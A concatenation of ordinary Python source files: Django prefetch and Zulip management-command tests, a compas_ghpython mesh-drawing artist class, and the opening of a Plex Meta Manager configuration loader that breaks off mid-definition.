self.assertEqual(book1.first_authors[1].happy_place, [])
self.assertEqual(book2.first_authors[0].happy_place, [self.author2_address1])
def test_prefetch_reverse_foreign_key(self):
with self.assertNumQueries(2):
bookwithyear1, = BookWithYear.objects.prefetch_related('bookreview_set')
with self.assertNumQueries(0):
self.assertCountEqual(bookwithyear1.bookreview_set.all(), [self.bookreview1])
with self.assertNumQueries(0):
prefetch_related_objects([bookwithyear1], 'bookreview_set')
def test_add_clears_prefetched_objects(self):
bookwithyear = BookWithYear.objects.get(pk=self.bookwithyear1.pk)
prefetch_related_objects([bookwithyear], 'bookreview_set')
self.assertCountEqual(bookwithyear.bookreview_set.all(), [self.bookreview1])
new_review = BookReview.objects.create()
bookwithyear.bookreview_set.add(new_review)
self.assertCountEqual(bookwithyear.bookreview_set.all(), [self.bookreview1, new_review])
def test_remove_clears_prefetched_objects(self):
bookwithyear = BookWithYear.objects.get(pk=self.bookwithyear1.pk)
prefetch_related_objects([bookwithyear], 'bookreview_set')
self.assertCountEqual(bookwithyear.bookreview_set.all(), [self.bookreview1])
bookwithyear.bookreview_set.remove(self.bookreview1)
self.assertCountEqual(bookwithyear.bookreview_set.all(), [])
class ReadPrefetchedObjectsCacheTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.book1 = Book.objects.create(title='Les confessions Volume I')
cls.book2 = Book.objects.create(title='Candide')
cls.author1 = AuthorWithAge.objects.create(name='Rousseau', first_book=cls.book1, age=70)
cls.author2 = AuthorWithAge.objects.create(name='Voltaire', first_book=cls.book2, age=65)
cls.book1.authors.add(cls.author1)
cls.book2.authors.add(cls.author2)
FavoriteAuthors.objects.create(author=cls.author1, likes_author=cls.author2)
def test_retrieves_results_from_prefetched_objects_cache(self):
"""
When intermediary results are prefetched without a destination
attribute, they are saved in the RelatedManager's cache
(_prefetched_objects_cache). prefetch_related() uses this cache
(#27554).
"""
authors = AuthorWithAge.objects.prefetch_related(
Prefetch(
'author',
queryset=Author.objects.prefetch_related(
# Results are saved in the RelatedManager's cache
# (_prefetched_objects_cache) and do not replace the
# RelatedManager on Author instances (favorite_authors)
Prefetch('favorite_authors__first_book'),
),
),
)
with self.assertNumQueries(4):
# AuthorWithAge -> Author -> FavoriteAuthors, Book
self.assertQuerysetEqual(authors, ['<AuthorWithAge: Rousseau>', '<AuthorWithAge: Voltaire>'])
|
the-stack_106_12991
|
# -*- coding: utf-8 -*-
import glob
import os
import re
from datetime import timedelta
from email.utils import parseaddr
from mock import MagicMock, patch, call
from typing import List, Dict, Any, Optional
from django.conf import settings
from django.core.management import call_command
from django.test import TestCase, override_settings
from zerver.lib.actions import do_create_user, do_deactivate_realm, do_reactivate_realm
from zerver.lib.management import ZulipBaseCommand, CommandError, check_config
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import stdout_suppressed
from zerver.lib.test_runner import slow
from zerver.models import get_user_profile_by_email
from zerver.models import get_realm, UserProfile, Realm
from confirmation.models import RealmCreationKey, generate_realm_creation_url
class TestCheckConfig(ZulipTestCase):
def test_check_config(self) -> None:
with self.assertRaisesRegex(CommandError, "Error: You must set ZULIP_ADMINISTRATOR in /etc/zulip/settings.py."):
check_config()
with self.settings(REQUIRED_SETTINGS=[('asdf', 'not asdf')]):
with self.assertRaisesRegex(CommandError, "Error: You must set asdf in /etc/zulip/settings.py."):
check_config()
@override_settings(WARN_NO_EMAIL=True)
def test_check_send_email(self) -> None:
with self.assertRaisesRegex(CommandError, "Outgoing email not yet configured, see"):
call_command("send_test_email", '[email protected]')
class TestZulipBaseCommand(ZulipTestCase):
def setUp(self) -> None:
self.zulip_realm = get_realm("zulip")
self.command = ZulipBaseCommand()
def test_get_client(self) -> None:
self.assertEqual(self.command.get_client().name, "ZulipServer")
def test_get_realm(self) -> None:
self.assertEqual(self.command.get_realm(dict(realm_id='zulip')), self.zulip_realm)
self.assertEqual(self.command.get_realm(dict(realm_id=None)), None)
self.assertEqual(self.command.get_realm(dict(realm_id='1')), self.zulip_realm)
with self.assertRaisesRegex(CommandError, "There is no realm with id"):
self.command.get_realm(dict(realm_id='17'))
with self.assertRaisesRegex(CommandError, "There is no realm with id"):
self.command.get_realm(dict(realm_id='mit'))
def test_get_user(self) -> None:
mit_realm = get_realm("zephyr")
user_profile = self.example_user("hamlet")
email = user_profile.email
self.assertEqual(self.command.get_user(email, self.zulip_realm), user_profile)
self.assertEqual(self.command.get_user(email, None), user_profile)
error_message = "The realm '<Realm: zephyr 2>' does not contain a user with email"
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_user(email, mit_realm)
with self.assertRaisesRegex(CommandError, "server does not contain a user with email"):
self.command.get_user('[email protected]', None)
do_create_user(email, 'password', mit_realm, 'full_name', 'short_name')
with self.assertRaisesRegex(CommandError, "server contains multiple users with that email"):
self.command.get_user(email, None)
def test_get_user_profile_by_email(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.email
self.assertEqual(get_user_profile_by_email(email), user_profile)
def get_users_sorted(self, options: Dict[str, Any], realm: Optional[Realm]) -> List[UserProfile]:
user_profiles = self.command.get_users(options, realm)
return sorted(user_profiles, key = lambda x: x.email)
def test_get_users(self) -> None:
user_emails = self.example_email("hamlet") + "," + self.example_email("iago")
expected_user_profiles = [self.example_user("hamlet"), self.example_user("iago")]
user_profiles = self.get_users_sorted(dict(users=user_emails), self.zulip_realm)
self.assertEqual(user_profiles, expected_user_profiles)
user_profiles = self.get_users_sorted(dict(users=user_emails), None)
self.assertEqual(user_profiles, expected_user_profiles)
user_emails = self.example_email("iago") + "," + self.mit_email("sipbtest")
expected_user_profiles = [self.example_user("iago"), self.mit_user("sipbtest")]
user_profiles = self.get_users_sorted(dict(users=user_emails), None)
self.assertEqual(user_profiles, expected_user_profiles)
error_message = "The realm '<Realm: zulip 1>' does not contain a user with email"
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_users(dict(users=user_emails), self.zulip_realm)
self.assertEqual(self.command.get_users(dict(users=self.example_email("iago")), self.zulip_realm),
[self.example_user("iago")])
self.assertEqual(self.command.get_users(dict(users=None), None), [])
def test_get_users_with_all_users_argument_enabled(self) -> None:
user_emails = self.example_email("hamlet") + "," + self.example_email("iago")
expected_user_profiles = [self.example_user("hamlet"), self.example_user("iago")]
user_profiles = self.get_users_sorted(dict(users=user_emails, all_users=False), self.zulip_realm)
self.assertEqual(user_profiles, expected_user_profiles)
error_message = "You can't use both -u/--users and -a/--all-users."
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_users(dict(users=user_emails, all_users=True), None)
expected_user_profiles = sorted(UserProfile.objects.filter(realm=self.zulip_realm),
key = lambda x: x.email)
user_profiles = self.get_users_sorted(dict(users=None, all_users=True), self.zulip_realm)
self.assertEqual(user_profiles, expected_user_profiles)
error_message = "You have to pass either -u/--users or -a/--all-users."
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_users(dict(users=None, all_users=False), None)
error_message = "The --all-users option requires a realm; please pass --realm."
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_users(dict(users=None, all_users=True), None)
class TestCommandsCanStart(TestCase):
def setUp(self) -> None:
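        # Build the list of management command names by globbing
        # */management/commands/*.py, stripping the .py suffix, and skipping
        # package __init__ modules.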
self.commands = filter(
lambda filename: filename != '__init__',
map(
lambda file: os.path.basename(file).replace('.py', ''),
glob.iglob('*/management/commands/*.py')
)
)
@slow("Aggregate of runs dozens of individual --help tests")
def test_management_commands_show_help(self) -> None:
with stdout_suppressed() as stdout:
for command in self.commands:
print('Testing management command: {}'.format(command),
file=stdout)
with self.assertRaises(SystemExit):
call_command(command, '--help')
# zerver/management/commands/runtornado.py sets this to True;
# we need to reset it here. See #3685 for details.
settings.RUNNING_INSIDE_TORNADO = False
class TestSendWebhookFixtureMessage(TestCase):
COMMAND_NAME = 'send_webhook_fixture_message'
def setUp(self) -> None:
self.fixture_path = os.path.join('some', 'fake', 'path.json')
self.url = '/some/url/with/hook'
@patch('zerver.management.commands.send_webhook_fixture_message.Command.print_help')
def test_check_if_command_exits_when_fixture_param_is_empty(self, print_help_mock: MagicMock) -> None:
with self.assertRaises(SystemExit):
call_command(self.COMMAND_NAME, url=self.url)
print_help_mock.assert_any_call('./manage.py', self.COMMAND_NAME)
@patch('zerver.management.commands.send_webhook_fixture_message.Command.print_help')
def test_check_if_command_exits_when_url_param_is_empty(self, print_help_mock: MagicMock) -> None:
with self.assertRaises(SystemExit):
call_command(self.COMMAND_NAME, fixture=self.fixture_path)
print_help_mock.assert_any_call('./manage.py', self.COMMAND_NAME)
@patch('zerver.management.commands.send_webhook_fixture_message.os.path.exists')
def test_check_if_command_exits_when_fixture_path_does_not_exist(
self, os_path_exists_mock: MagicMock) -> None:
os_path_exists_mock.return_value = False
with self.assertRaises(SystemExit):
call_command(self.COMMAND_NAME, fixture=self.fixture_path, url=self.url)
os_path_exists_mock.assert_any_call(os.path.join(settings.DEPLOY_ROOT, self.fixture_path))
@patch('zerver.management.commands.send_webhook_fixture_message.os.path.exists')
@patch('zerver.management.commands.send_webhook_fixture_message.Client')
@patch('zerver.management.commands.send_webhook_fixture_message.ujson')
@patch("zerver.management.commands.send_webhook_fixture_message.open", create=True)
def test_check_if_command_post_request_to_url_with_fixture(self,
open_mock: MagicMock,
ujson_mock: MagicMock,
client_mock: MagicMock,
os_path_exists_mock: MagicMock) -> None:
ujson_mock.loads.return_value = '{}'
ujson_mock.dumps.return_value = {}
os_path_exists_mock.return_value = True
client = client_mock()
with self.assertRaises(SystemExit):
call_command(self.COMMAND_NAME, fixture=self.fixture_path, url=self.url)
self.assertTrue(ujson_mock.dumps.called)
self.assertTrue(ujson_mock.loads.called)
self.assertTrue(open_mock.called)
client.post.assert_called_once_with(self.url, {}, content_type="application/json",
HTTP_HOST="zulip.testserver")
class TestGenerateRealmCreationLink(ZulipTestCase):
COMMAND_NAME = "generate_realm_creation_link"
@override_settings(OPEN_REALM_CREATION=False)
def test_generate_link_and_create_realm(self) -> None:
email = "[email protected]"
generated_link = generate_realm_creation_url(by_admin=True)
# Get realm creation page
result = self.client_get(generated_link)
self.assert_in_success_response([u"Create a new Zulip organization"], result)
# Enter email
self.assertIsNone(get_realm('test'))
result = self.client_post(generated_link, {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(re.search(r'/accounts/do_confirm/\w+$', result["Location"]))
# Bypass sending mail for confirmation, go straight to creation form
result = self.client_get(result["Location"])
self.assert_in_response('action="/accounts/register/"', result)
# Original link is now dead
result = self.client_get(generated_link)
self.assert_in_success_response(["The organization creation link has expired or is not valid."], result)
@override_settings(OPEN_REALM_CREATION=False)
def test_generate_link_confirm_email(self) -> None:
email = "[email protected]"
generated_link = generate_realm_creation_url(by_admin=False)
result = self.client_post(generated_link, {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(re.search('/accounts/new/send_confirm/{}$'.format(email),
result["Location"]))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started", result)
# Original link is now dead
result = self.client_get(generated_link)
self.assert_in_success_response(["The organization creation link has expired or is not valid."], result)
@override_settings(OPEN_REALM_CREATION=False)
def test_realm_creation_with_random_link(self) -> None:
# Realm creation attempt with an invalid link should fail
random_link = "/new/5e89081eb13984e0f3b130bf7a4121d153f1614b"
result = self.client_get(random_link)
self.assert_in_success_response(["The organization creation link has expired or is not valid."], result)
@override_settings(OPEN_REALM_CREATION=False)
def test_realm_creation_with_expired_link(self) -> None:
generated_link = generate_realm_creation_url(by_admin=True)
key = generated_link[-24:]
# Manually expire the link by changing the date of creation
obj = RealmCreationKey.objects.get(creation_key=key)
obj.date_created = obj.date_created - timedelta(days=settings.REALM_CREATION_LINK_VALIDITY_DAYS + 1)
obj.save()
result = self.client_get(generated_link)
self.assert_in_success_response(["The organization creation link has expired or is not valid."], result)
class TestCalculateFirstVisibleMessageID(ZulipTestCase):
COMMAND_NAME = 'calculate_first_visible_message_id'
def test_check_if_command_calls_maybe_update_first_visible_message_id(self) -> None:
with patch('zerver.lib.message.maybe_update_first_visible_message_id') as m:
call_command(self.COMMAND_NAME, "--realm=zulip", "--lookback-hours=30")
m.assert_called_with(get_realm("zulip"), 30)
with patch('zerver.lib.message.maybe_update_first_visible_message_id') as m:
call_command(self.COMMAND_NAME, "--lookback-hours=35")
calls = [call(realm, 35) for realm in Realm.objects.all()]
        m.assert_has_calls(calls, any_order=True)
class TestPasswordResetEmail(ZulipTestCase):
COMMAND_NAME = "send_password_reset_email"
def test_if_command_sends_password_reset_email(self) -> None:
call_command(self.COMMAND_NAME, users=self.example_email("iago"))
from django.core.mail import outbox
from_email = outbox[0].from_email
self.assertIn("Zulip Account Security", from_email)
tokenized_no_reply_email = parseaddr(from_email)[1]
self.assertTrue(re.search(self.TOKENIZED_NOREPLY_REGEX, tokenized_no_reply_email))
self.assertIn("reset your password", outbox[0].body)
class TestRealmReactivationEmail(ZulipTestCase):
COMMAND_NAME = "send_realm_reactivation_email"
def test_if_realm_not_deactivated(self) -> None:
realm = get_realm('zulip')
with self.assertRaisesRegex(CommandError, "The realm %s is already active." % (realm.name,)):
call_command(self.COMMAND_NAME, "--realm=zulip")
|
the-stack_106_12992
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import compas_ghpython
from compas_ghpython.artists.mixins import EdgeArtist
from compas_ghpython.artists.mixins import FaceArtist
from compas_ghpython.artists.mixins import VertexArtist
from compas.geometry import centroid_polygon
from compas.utilities import pairwise
__all__ = ['MeshArtist']
class MeshArtist(FaceArtist, EdgeArtist, VertexArtist):
"""A mesh artist defines functionality for visualising COMPAS meshes in GhPython.
Parameters
----------
mesh : compas.datastructures.Mesh
A COMPAS mesh.
Attributes
----------
defaults : dict
Default settings for color, scale, tolerance, ...
Examples
--------
.. code-block:: python
import compas
from compas.datastructures import Mesh
from compas_ghpython.artists import MeshArtist
mesh = Mesh.from_obj(compas.get('faces.obj'))
artist = MeshArtist(mesh)
artist.draw_faces(join_faces=True)
artist.draw_vertices(color={key: '#ff0000' for key in mesh.vertices_on_boundary()})
artist.draw_edges()
"""
def __init__(self, mesh):
self.mesh = mesh
self.defaults = {
'color.vertex': (255, 255, 255),
'color.edge': (0, 0, 0),
'color.face': (210, 210, 210),
}
@property
def mesh(self):
"""compas.datastructures.Mesh: The mesh that should be painted."""
return self.datastructure
@mesh.setter
def mesh(self, mesh):
self.datastructure = mesh
def draw(self, color=None):
"""Deprecated. Use ``draw_mesh()``"""
        # NOTE: This warning should be raised via warnings.warn() rather than a print statement, but GH completely ignores Python warnings
print('MeshArtist.draw() is deprecated: please use draw_mesh() instead')
return self.draw_mesh(color)
def draw_mesh(self, color=None):
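        # compas_ghpython.draw_mesh is fed four vertex indices per face, so
        # triangles and n-gons are remapped to (possibly degenerate) quads below.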
key_index = self.mesh.key_index()
vertices = self.mesh.get_vertices_attributes('xyz')
faces = [[key_index[key] for key in self.mesh.face_vertices(fkey)] for fkey in self.mesh.faces()]
        new_faces = []
        for face in faces:
            f = len(face)
            if f == 3:
                # Triangles: repeat the last vertex to form a degenerate quad.
                new_faces.append(face + [face[-1]])
            elif f == 4:
                new_faces.append(face)
            elif f > 4:
                # N-gons: append the face centroid as an extra vertex and fan
                # the polygon into degenerate quads around it.
                centroid = len(vertices)
                vertices.append(centroid_polygon(
                    [vertices[index] for index in face]))
                for a, b in pairwise(face + face[0:1]):
                    new_faces.append([centroid, a, b, b])
            else:
                continue
return compas_ghpython.draw_mesh(vertices, new_faces, color)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
from compas.datastructures import Mesh
from compas.geometry import Polyhedron
poly = Polyhedron.generate(12)
mesh = Mesh.from_vertices_and_faces(poly.vertices, poly.faces)
artist = MeshArtist(mesh)
vertices = artist.draw_vertices()
faces = artist.draw_faces()
edges = artist.draw_edges()
|
the-stack_106_12995
|
import base64, logging, os, requests
from datetime import datetime
from lxml import html
from modules import util, radarr, sonarr
from modules.anidb import AniDB
from modules.anilist import AniList
from modules.cache import Cache
from modules.convert import Convert
from modules.icheckmovies import ICheckMovies
from modules.imdb import IMDb
from modules.letterboxd import Letterboxd
from modules.mal import MyAnimeList
from modules.notifiarr import Notifiarr
from modules.omdb import OMDb
from modules.plex import Plex
from modules.radarr import Radarr
from modules.sonarr import Sonarr
from modules.stevenlu import StevenLu
from modules.tautulli import Tautulli
from modules.tmdb import TMDb
from modules.trakt import Trakt
from modules.tvdb import TVDb
from modules.util import Failed
from modules.webhooks import Webhooks
from retrying import retry
from ruamel import yaml
logger = logging.getLogger("Plex Meta Manager")
sync_modes = {"append": "Only Add Items to the Collection", "sync": "Add & Remove Items from the Collection"}
mass_update_options = {"tmdb": "Use TMDb Metadata", "omdb": "Use IMDb Metadata through OMDb"}
class Config:
def __init__(self, default_dir, attrs):
logger.info("Locating config...")
config_file = attrs["config_file"]
if config_file and os.path.exists(config_file): self.config_path = os.path.abspath(config_file)
elif config_file and not os.path.exists(config_file): raise Failed(f"Config Error: config not found at {os.path.abspath(config_file)}")
elif os.path.exists(os.path.join(default_dir, "config.yml")): self.config_path = os.path.abspath(os.path.join(default_dir, "config.yml"))
else: raise Failed(f"Config Error: config not found at {os.path.abspath(default_dir)}")
logger.info(f"Using {self.config_path} as config")
self.default_dir = default_dir
self.test_mode = attrs["test"] if "test" in attrs else False
self.trace_mode = attrs["trace"] if "trace" in attrs else False
self.run_start_time = attrs["time"]
self.run_hour = datetime.strptime(attrs["time"], "%H:%M").hour
self.requested_collections = util.get_list(attrs["collections"]) if "collections" in attrs else None
self.requested_libraries = util.get_list(attrs["libraries"]) if "libraries" in attrs else None
self.resume_from = attrs["resume"] if "resume" in attrs else None
yaml.YAML().allow_duplicate_keys = True
try:
new_config, _, _ = yaml.util.load_yaml_guess_indent(open(self.config_path, encoding="utf-8"))
def replace_attr(all_data, attr, par):
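                # Move `attr` from the legacy `par` section into `settings`,
                # unless `settings` already defines it.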
if "settings" not in all_data:
all_data["settings"] = {}
if par in all_data and all_data[par] and attr in all_data[par] and attr not in all_data["settings"]:
all_data["settings"][attr] = all_data[par][attr]
del all_data[par][attr]
if "libraries" not in new_config:
new_config["libraries"] = {}
if "settings" not in new_config:
new_config["settings"] = {}
if "tmdb" not in new_config:
new_config["tmdb"] = {}
replace_attr(new_config, "cache", "cache")
replace_attr(new_config, "cache_expiration", "cache")
if "config" in new_config:
del new_config["cache"]
replace_attr(new_config, "asset_directory", "plex")
replace_attr(new_config, "sync_mode", "plex")
replace_attr(new_config, "show_unmanaged", "plex")
replace_attr(new_config, "show_filtered", "plex")
replace_attr(new_config, "show_missing", "plex")
replace_attr(new_config, "save_missing", "plex")
if new_config["libraries"]:
for library in new_config["libraries"]:
if new_config["libraries"][library] and "plex" in new_config["libraries"][library]:
replace_attr(new_config["libraries"][library], "asset_directory", "plex")
replace_attr(new_config["libraries"][library], "sync_mode", "plex")
replace_attr(new_config["libraries"][library], "show_unmanaged", "plex")
replace_attr(new_config["libraries"][library], "show_filtered", "plex")
replace_attr(new_config["libraries"][library], "show_missing", "plex")
replace_attr(new_config["libraries"][library], "save_missing", "plex")
if "libraries" in new_config: new_config["libraries"] = new_config.pop("libraries")
if "settings" in new_config: new_config["settings"] = new_config.pop("settings")
if "webhooks" in new_config: new_config["webhooks"] = new_config.pop("webhooks")
if "plex" in new_config: new_config["plex"] = new_config.pop("plex")
if "tmdb" in new_config: new_config["tmdb"] = new_config.pop("tmdb")
if "tautulli" in new_config: new_config["tautulli"] = new_config.pop("tautulli")
if "omdb" in new_config: new_config["omdb"] = new_config.pop("omdb")
if "notifiarr" in new_config: new_config["notifiarr"] = new_config.pop("notifiarr")
if "anidb" in new_config: new_config["anidb"] = new_config.pop("anidb")
if "radarr" in new_config: new_config["radarr"] = new_config.pop("radarr")
if "sonarr" in new_config: new_config["sonarr"] = new_config.pop("sonarr")
if "trakt" in new_config: new_config["trakt"] = new_config.pop("trakt")
if "mal" in new_config: new_config["mal"] = new_config.pop("mal")
yaml.round_trip_dump(new_config, open(self.config_path, "w", encoding="utf-8"), indent=None, block_seq_indent=2)
self.data = new_config
except yaml.scanner.ScannerError as e:
raise Failed(f"YAML Error: {util.tab_new_lines(e)}")
except Exception as e:
util.print_stacktrace()
raise Failed(f"YAML Error: {e}")
        def check_for_attribute(data, attribute, parent=None, test_list=None, default=None, do_print=True, default_is_none=False, req_default=False, var_type="str", throw=False, save=True):
            # Look up `attribute` (optionally under `parent`) in `data`, validate it
            # against `var_type`/`test_list`, and return it; otherwise fall back to
            # `default` (optionally writing it back to the config file) or raise Failed.
            endline = ""
if parent is not None:
if data and parent in data:
data = data[parent]
else:
data = None
do_print = False
save = False
text = f"{attribute} attribute" if parent is None else f"{parent} sub-attribute {attribute}"
if data is None or attribute not in data:
message = f"{text} not found"
if parent and save is True:
loaded_config, _, _ = yaml.util.load_yaml_guess_indent(open(self.config_path))
endline = f"\n{parent} sub-attribute {attribute} added to config"
if parent not in loaded_config or not loaded_config[parent]: loaded_config[parent] = {attribute: default}
elif attribute not in loaded_config[parent]: loaded_config[parent][attribute] = default
else: endline = ""
yaml.round_trip_dump(loaded_config, open(self.config_path, "w"), indent=None, block_seq_indent=2)
elif data[attribute] is None:
if default_is_none is True: return None
else: message = f"{text} is blank"
elif var_type == "url":
if data[attribute].endswith(("\\", "/")): return data[attribute][:-1]
else: return data[attribute]
elif var_type == "bool":
if isinstance(data[attribute], bool): return data[attribute]
else: message = f"{text} must be either true or false"
elif var_type == "int":
if isinstance(data[attribute], int) and data[attribute] >= 0: return data[attribute]
else: message = f"{text} must an integer >= 0"
elif var_type == "path":
if os.path.exists(os.path.abspath(data[attribute])): return data[attribute]
else: message = f"Path {os.path.abspath(data[attribute])} does not exist"
elif var_type == "list": return util.get_list(data[attribute], split=False)
elif var_type == "list_path":
temp_list = [p for p in util.get_list(data[attribute], split=False) if os.path.exists(os.path.abspath(p))]
if len(temp_list) > 0: return temp_list
else: message = "No Paths exist"
elif var_type == "lower_list": return util.get_list(data[attribute], lower=True)
elif test_list is None or data[attribute] in test_list: return data[attribute]
else: message = f"{text}: {data[attribute]} is an invalid input"
if var_type == "path" and default and os.path.exists(os.path.abspath(default)):
return default
elif var_type == "path" and default:
if data and attribute in data and data[attribute]:
message = f"neither {data[attribute]} or the default path {default} could be found"
else:
message = f"no {text} found and the default path {default} could not be found"
default = None
if default is not None or default_is_none:
message = message + f" using {default} as default"
message = message + endline
if req_default and default is None:
raise Failed(f"Config Error: {attribute} attribute must be set under {parent} globally or under this specific Library")
options = ""
if test_list:
for option, description in test_list.items():
if len(options) > 0:
options = f"{options}\n"
options = f"{options} {option} ({description})"
if (default is None and not default_is_none) or throw:
if len(options) > 0:
message = message + "\n" + options
raise Failed(f"Config Error: {message}")
if do_print:
util.print_multiline(f"Config Warning: {message}")
if data and attribute in data and data[attribute] and test_list is not None and data[attribute] not in test_list:
util.print_multiline(options)
return default
self.session = requests.Session()
self.general = {
"cache": check_for_attribute(self.data, "cache", parent="settings", var_type="bool", default=True),
"cache_expiration": check_for_attribute(self.data, "cache_expiration", parent="settings", var_type="int", default=60),
"asset_directory": check_for_attribute(self.data, "asset_directory", parent="settings", var_type="list_path", default=[os.path.join(default_dir, "assets")]),
"asset_folders": check_for_attribute(self.data, "asset_folders", parent="settings", var_type="bool", default=True),
"assets_for_all": check_for_attribute(self.data, "assets_for_all", parent="settings", var_type="bool", default=False, save=False, do_print=False),
"sync_mode": check_for_attribute(self.data, "sync_mode", parent="settings", default="append", test_list=sync_modes),
"run_again_delay": check_for_attribute(self.data, "run_again_delay", parent="settings", var_type="int", default=0),
"show_unmanaged": check_for_attribute(self.data, "show_unmanaged", parent="settings", var_type="bool", default=True),
"show_filtered": check_for_attribute(self.data, "show_filtered", parent="settings", var_type="bool", default=False),
"show_missing": check_for_attribute(self.data, "show_missing", parent="settings", var_type="bool", default=True),
"show_missing_assets": check_for_attribute(self.data, "show_missing_assets", parent="settings", var_type="bool", default=True),
"save_missing": check_for_attribute(self.data, "save_missing", parent="settings", var_type="bool", default=True),
"missing_only_released": check_for_attribute(self.data, "missing_only_released", parent="settings", var_type="bool", default=False),
"create_asset_folders": check_for_attribute(self.data, "create_asset_folders", parent="settings", var_type="bool", default=False),
"collection_minimum": check_for_attribute(self.data, "collection_minimum", parent="settings", var_type="int", default=1),
"delete_below_minimum": check_for_attribute(self.data, "delete_below_minimum", parent="settings", var_type="bool", default=False),
"tvdb_language": check_for_attribute(self.data, "tvdb_language", parent="settings", default="default")
}
self.webhooks = {
"error": check_for_attribute(self.data, "error", parent="webhooks", var_type="list", default_is_none=True),
"run_start": check_for_attribute(self.data, "run_start", parent="webhooks", var_type="list", default_is_none=True),
"run_end": check_for_attribute(self.data, "run_end", parent="webhooks", var_type="list", default_is_none=True),
"collection_creation": check_for_attribute(self.data, "collection_creation", parent="webhooks", var_type="list", default_is_none=True),
"collection_addition": check_for_attribute(self.data, "collection_addition", parent="webhooks", var_type="list", default_is_none=True),
"collection_removal": check_for_attribute(self.data, "collection_removal", parent="webhooks", var_type="list", default_is_none=True),
}
if self.general["cache"]:
util.separator()
self.Cache = Cache(self.config_path, self.general["cache_expiration"])
else:
self.Cache = None
util.separator()
self.NotifiarrFactory = None
if "notifiarr" in self.data:
logger.info("Connecting to Notifiarr...")
try:
self.NotifiarrFactory = Notifiarr(self, {
"apikey": check_for_attribute(self.data, "apikey", parent="notifiarr", throw=True),
"develop": check_for_attribute(self.data, "develop", parent="notifiarr", var_type="bool", default=False, do_print=False, save=False),
"test": check_for_attribute(self.data, "test", parent="notifiarr", var_type="bool", default=False, do_print=False, save=False)
})
except Failed as e:
logger.error(e)
logger.info(f"Notifiarr Connection {'Failed' if self.NotifiarrFactory is None else 'Successful'}")
else:
logger.warning("notifiarr attribute not found")
self.Webhooks = Webhooks(self, self.webhooks, notifiarr=self.NotifiarrFactory)
self.Webhooks.start_time_hooks(self.run_start_time)
self.errors = []
util.separator()
try:
self.TMDb = None
if "tmdb" in self.data:
logger.info("Connecting to TMDb...")
self.TMDb = TMDb(self, {
"apikey": check_for_attribute(self.data, "apikey", parent="tmdb", throw=True),
"language": check_for_attribute(self.data, "language", parent="tmdb", default="en")
})
logger.info(f"TMDb Connection {'Failed' if self.TMDb is None else 'Successful'}")
else:
raise Failed("Config Error: tmdb attribute not found")
util.separator()
self.OMDb = None
if "omdb" in self.data:
logger.info("Connecting to OMDb...")
try:
self.OMDb = OMDb(self, {"apikey": check_for_attribute(self.data, "apikey", parent="omdb", throw=True)})
except Failed as e:
self.errors.append(e)
logger.error(e)
logger.info(f"OMDb Connection {'Failed' if self.OMDb is None else 'Successful'}")
else:
logger.warning("omdb attribute not found")
util.separator()
self.Trakt = None
if "trakt" in self.data:
logger.info("Connecting to Trakt...")
try:
self.Trakt = Trakt(self, {
"client_id": check_for_attribute(self.data, "client_id", parent="trakt", throw=True),
"client_secret": check_for_attribute(self.data, "client_secret", parent="trakt", throw=True),
"config_path": self.config_path,
"authorization": self.data["trakt"]["authorization"] if "authorization" in self.data["trakt"] else None
})
except Failed as e:
self.errors.append(e)
logger.error(e)
logger.info(f"Trakt Connection {'Failed' if self.Trakt is None else 'Successful'}")
else:
logger.warning("trakt attribute not found")
util.separator()
self.MyAnimeList = None
if "mal" in self.data:
logger.info("Connecting to My Anime List...")
try:
self.MyAnimeList = MyAnimeList(self, {
"client_id": check_for_attribute(self.data, "client_id", parent="mal", throw=True),
"client_secret": check_for_attribute(self.data, "client_secret", parent="mal", throw=True),
"config_path": self.config_path,
"authorization": self.data["mal"]["authorization"] if "authorization" in self.data["mal"] else None
})
except Failed as e:
self.errors.append(e)
logger.error(e)
logger.info(f"My Anime List Connection {'Failed' if self.MyAnimeList is None else 'Successful'}")
else:
logger.warning("mal attribute not found")
util.separator()
self.AniDB = None
if "anidb" in self.data:
util.separator()
logger.info("Connecting to AniDB...")
try:
self.AniDB = AniDB(self, {
"username": check_for_attribute(self.data, "username", parent="anidb", throw=True),
"password": check_for_attribute(self.data, "password", parent="anidb", throw=True)
})
except Failed as e:
self.errors.append(e)
logger.error(e)
logger.info(f"My Anime List Connection {'Failed Continuing as Guest ' if self.MyAnimeList is None else 'Successful'}")
if self.AniDB is None:
self.AniDB = AniDB(self, None)
self.TVDb = TVDb(self, self.general["tvdb_language"])
self.IMDb = IMDb(self)
self.Convert = Convert(self)
self.AniList = AniList(self)
self.Letterboxd = Letterboxd(self)
self.ICheckMovies = ICheckMovies(self)
self.StevenLu = StevenLu(self)
util.separator()
logger.info("Connecting to Plex Libraries...")
self.general["plex"] = {
"url": check_for_attribute(self.data, "url", parent="plex", var_type="url", default_is_none=True),
"token": check_for_attribute(self.data, "token", parent="plex", default_is_none=True),
"timeout": check_for_attribute(self.data, "timeout", parent="plex", var_type="int", default=60),
"clean_bundles": check_for_attribute(self.data, "clean_bundles", parent="plex", var_type="bool", default=False),
"empty_trash": check_for_attribute(self.data, "empty_trash", parent="plex", var_type="bool", default=False),
"optimize": check_for_attribute(self.data, "optimize", parent="plex", var_type="bool", default=False)
}
self.general["radarr"] = {
"url": check_for_attribute(self.data, "url", parent="radarr", var_type="url", default_is_none=True),
"token": check_for_attribute(self.data, "token", parent="radarr", default_is_none=True),
"add": check_for_attribute(self.data, "add", parent="radarr", var_type="bool", default=False),
"add_existing": check_for_attribute(self.data, "add_existing", parent="radarr", var_type="bool", default=False),
"root_folder_path": check_for_attribute(self.data, "root_folder_path", parent="radarr", default_is_none=True),
"monitor": check_for_attribute(self.data, "monitor", parent="radarr", var_type="bool", default=True),
"availability": check_for_attribute(self.data, "availability", parent="radarr", test_list=radarr.availability_descriptions, default="announced"),
"quality_profile": check_for_attribute(self.data, "quality_profile", parent="radarr", default_is_none=True),
